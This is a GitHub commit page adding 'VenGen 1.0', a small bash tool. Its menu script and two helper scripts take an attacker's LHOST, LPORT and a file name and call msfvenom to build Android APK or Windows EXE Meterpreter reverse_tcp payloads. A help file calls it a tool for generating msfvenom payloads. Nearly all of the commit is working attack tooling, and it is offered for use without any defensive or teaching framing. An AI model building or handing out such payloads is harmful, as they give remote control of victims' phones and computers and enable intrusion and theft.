-
Notifications
You must be signed in to change notification settings - Fork 1
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Showing
4 changed files
with
80 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
#!/bin/bash | ||
#VenGen_1.0 | ||
#ByNiirmaalTwaatii | ||
|
||
echo "" | ||
figlet VenGen | ||
echo "" | ||
echo "~~~~~~~~~~~~~ VenGen 1.0 ~~~~~~~~~~~~~" | ||
echo "" | ||
echo "[]>=>=>=>=> By Niirmaal Twaatii ;" | ||
echo "" | ||
|
||
echo "-------------------------------------" | ||
echo "" | ||
echo "[1]=>Android Meterpreter Reverse tcp Payload (apk)" | ||
echo "[2]=>Windows Meterpreter Reverse tcp Payload=>(exe)" | ||
echo "[3]=>Help" | ||
echo "[0]=>Exit" | ||
echo "" | ||
echo "-------------------------------------" | ||
echo "" | ||
|
||
read -p "[Input]=> " inp | ||
|
||
echo "" | ||
|
||
case "$inp" in | ||
[1] ) ./android_reverse_tcp.sh;; | ||
[2] ) ./windows_reverse_tcp.sh;; | ||
[3] ) cat help.txt && sleep 5 && ./VenGen.sh;; | ||
[0] ) exit;; | ||
* ) echo "Invalid Command " && ./VenGen.sh;; | ||
esac |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
#!/bin/bash | ||
|
||
read -p "LHOST: " lhost | ||
echo "" | ||
echo "[LHOST]=> $lhost" | ||
echo "" | ||
read -p "LPORT: " lport | ||
echo "" | ||
echo "[LPORT]=> $lport" | ||
echo "" | ||
read -p "NAME: " name | ||
echo "" | ||
|
||
echo "Generating Payload..." | ||
echo "" | ||
|
||
msfvenom -p android/meterpreter/reverse_tcp lhost=$lhost lport=$lport -o ${name}.apk | ||
|
||
echo "" | ||
echo "Payload Sucessfully Generated !!!" | ||
echo "" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
|
||
VenGen :- | ||
|
||
It is a Tool for Generating msfvenom payloads ! | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,21 @@ | ||
#!/bin/bash | ||
|
||
read -p "LHOST: " lhost | ||
echo "" | ||
echo "[LHOST]=> $lhost" | ||
echo "" | ||
read -p "LPORT: " lport | ||
echo "" | ||
echo "[LPORT]=> $lport" | ||
echo "" | ||
read -p "NAME: " name | ||
echo "" | ||
|
||
echo "Generating Payload..." | ||
echo "" | ||
|
||
msfvenom -p windows/meterpreter/reverse_tcp -f exe lhost=$lhost lport=$lport -o ${name}.exe | ||
|
||
echo "" | ||
echo "Payload Sucessfully Generated !!!" | ||
echo "" |